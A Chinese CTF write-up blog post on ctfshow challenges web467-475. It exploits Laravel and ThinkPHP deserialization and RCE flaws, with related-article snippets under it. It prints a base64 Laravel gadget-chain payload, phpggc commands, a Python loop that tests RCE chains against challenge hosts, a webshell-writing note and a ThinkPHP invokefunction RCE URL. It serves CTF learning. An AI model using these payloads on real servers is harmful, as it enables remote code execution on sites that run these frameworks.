ctfshow 框架复现 web467-web475

最新推荐文章于 2024-09-09 13:41:22 发布
最新推荐文章于 2024-09-09 13:41:22 发布
阅读量525 收藏 9
点赞数 10
文章标签: 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cht6667/article/details/136259405
版权

这里直接实用php反序列化工具phpcgi进行攻击,里面继承了一些常见php框架的反序列化漏洞,找到合适的漏洞就可以利用了

./ghpgcc -l

找到具体的框架和对应的漏洞后

./ghpgcc -i Laravel/RCE2

将反序列化的值进行base64编码后进行命令执行

/admin/Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIA
KgBldmVudHMiO086Mjg6IklsbHVtaW5hdGVcRXZlbnRzXERpc3BhdGNoZXIiOjE6e3M6MTI6IgAq
AGxpc3RlbmVycyI7YToxOntzOjg6InRhYyAvZmwqIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fX19
czo4OiIAKgBldmVudCI7czo4OiJ0YWMgL2ZsKiI7fQo=

web467 Laravel

还是利用rce2

web468 Laravel

import os
import requests

for i in range(1,20):
    data=os.popen(f"./phpggc  Laravel/RCE{i} system 'ls'|base64").read()
    url = f"http://30addae8-943a-42f4-9f4e-b004b49f91b5.challenge.ctf.show/admin/{data}"
    res=requests.get(url).text
    if 'unserialize' and 'done' in res:
        if "Exception" not in res:
            print(f"RCE{i}success!")

发现反序列化结果会被调试页面覆盖,这里将结果写入文件就可以了

web469 Laravel

rec4就可以了

web470 Laravel

web471 Laravel

同上

web472 Laravel

检测到14还可以用。

web473 thinkphp

https://www.cnblogs.com/litlife/p/11273652.html

工具一把梭,后面来研究原理

web474 tp5 construct_code_exec_2

Thinkphp v5.x 远程代码执行漏洞复现及POC集合-CSDN博客

通过扫描http://d3b9ec88-7ab9-4c06-ba6b-daeb75d696b4.challenge.ctf.show/public,发现了这个漏洞,命令执行没有回显,写入shell就可以了。

web475 thinkphp

web475 thinkphp

NEO:Curi:aos
关注
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
ThinkPHP5 远程代码执行漏洞分析
repoman的博客
03-16 7935
前言 消息刚刚曝出来的时候还以为自己能半天把漏洞给找出来,果然是太菜太年轻了,23333 漏洞分析 漏洞点 此次漏洞出现在ThinkPHP用于处理HTTP请求的Request类中,其中的method方法用于获取当前的请求类型。 thinkphp/library/think/Request.php var_method为“表单伪装变量”,可在application/config.ph...
工具推荐 | TPscan - 一键ThinkPHP漏洞检测getshell
最新发布
哈利波特的博客
09-09 452
工具推荐 | TPscan (最新版本) - 一键ThinkPHP漏洞检测getshell
tp5.0漏洞修复
qq_42740298的博客
09-08 572
修改路径\thinkphp\library\think\Request.php 525行 // $this->method = strtoupper($_POST[Config::get('var_method')]); // $this->{$this->method}($_POST); $method = strtoupper($_POST[Config::get('var_method')]); if (in_arra
Tp5导出exec
weixin_43023551的博客
09-16 225
public function add() { $param = request()->param(); $Maintenance = new \app\common\model\EquipmentMaintenanceManagement; $haderText = ['订单号', '报修人', '维修工程师', '设备名称', '设备编码', '所属医院', '所属科室', '报修开始时间', '维修开始时间','维修完成时间','状态']
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 2092
thinkPHP5漏洞复现
web安全-权限管理系统.zip
03-08
项目具有较高的学习借鉴价值,也可直接拿来修改复现。可以在这些基础上学习借鉴进行修改和扩展,实现其它功能。 可放心下载学习借鉴,你会有所收获。 —— 对于学习和实践,选择合适的项目和资源确实是一种有效的...
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
复现Dirty Cow漏洞之前,你需要设置一个合适的实验环境。这通常包括一个主机操作系统,例如Ubuntu、Debian或其他Linux发行版,以及一个作为靶机的系统,如Metasploitable2-Linux。靶机的IP地址应配置为192.168....
论文研读-论文复现-QQ-Net
08-20
本资源主要包含了复现论文以及复现代码: 这是一篇关于使用深度学习技术改进定量易感性映射(Quantitative Susceptibility Mapping, QSM)和定量血氧水平依赖性(Quantitative Blood Oxygen Level Dependent, qBOLD...
web-租房系统.zip
03-08
项目具有较高的学习借鉴价值,也可直接拿来修改复现。可以在这些基础上学习借鉴进行修改和扩展,实现其它功能。 可放心下载学习借鉴,你会有所收获。 —— 对于学习和实践,选择合适的项目和资源确实是一种有效的...
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
EC_Carrot的博客
08-17 331
漏洞详细 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 漏洞复现 直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo: 当
CTFshow——thinkphp专题
D.MIND 的博客
06-12 1808
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
ctfshow web入门(thinkphp专题)
Blazing-Angel的博客
02-09 837
569 URL模式 查阅手册:URL模式 · ThinkPHP3.2.3完全开发手册 http://serverName/index.php/模块/控制器/操作 payload: 普通模式:/?m=Admin&c=Login&a=ctfshowLogin Pathinfo模式:/index.php/Admin/Login/ctfshowLogin 兼容模式:/?s=/Admin/Login/ctfshowLogin 570 路由 发现路由: 根据手册: 直接构造:这里直接执行不可以
ThinkPHP代码执行漏洞
Massimo__JAVA的博客
07-01 2205
特征:被检测系统报错页面出现“十年磨一剑-为API开发设计的高性能框架”,则判定该系统使用ThinkPHP5开发。
学习笔记-TP5反序列化利用
人饭子的博客
11-09 597
TP5反序列化利用链 本文以第二人称视角重点谈谈给你了反序列化的利用链你该怎么写exp。 文章很长,当故事看即可。 漏洞版本为 ThinkPHP 5.1.X 下图是Mochazz 大佬画的非常优雅的一张调用链图 10 如果说之前了解过PHP反序列(重点知识)的基础知识(入门知识),那么一眼就能明白这条链的起点-跳板-终点是什么。 以析构函数为起点开始调用;以__toString方法为跳板寻...
Web】Ctfshow Thinkphp3.2.3代码审计(2)
uuzeray的博客
12-25 387
这段代码的作用是根据数据库字段类型的定义,对数据进行相应的类型转换,以确保数据的类型与数据库字段类型匹配,从而提高数据的准确性和一致性。比如数据库中的id是int型会进入intval函数,你输入1' union select * # 转换后就成了1。因为$options['where']是一个数组,所以会从if进入_parseType。其实很明显就是让$options['where']不为数组就可以了。所以要用一些路子,不进入到下面的if判断里。因为1是number,所以会让。这是我们不愿意看到的。
ctfshow thinkphp专题
Sentiment的博客
05-25 1760
web569 主要就是考察了一个url解析模式 http://localhost/index.php/模块/控制器/操作/参数/值 payload: /index.php/Admin/Login/ctfshowLogin web570 Common/Conf/config.php,发现可利用点,一个闭包路由 'ctfshow/:f/:a' =>function($f,$a){ call_user_func($f, $a); } 传参发现也能正常执行 /index.php/ctfsho
Web】Ctfshow Thinkphp3.2.3代码审计(4)
uuzeray的博客
12-28 1172
这里是从cookie里读user键对应的值进行反序列化,并将实例化对象与传入的id比较,如果id属性与传入的id相等,则show方法调用底层的eval执行实例化对象的username属性。因此,确保在进行反序列化之前,你需要确保序列化的类定义存在,并且能够被自动加载或手动引入。这里令$name=_content,$from=写的马即可让$_content非空,从而eval()执行php代码。这次where()里直接传了一个数组,省得走if将字符串的值再改为_string的数组了。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值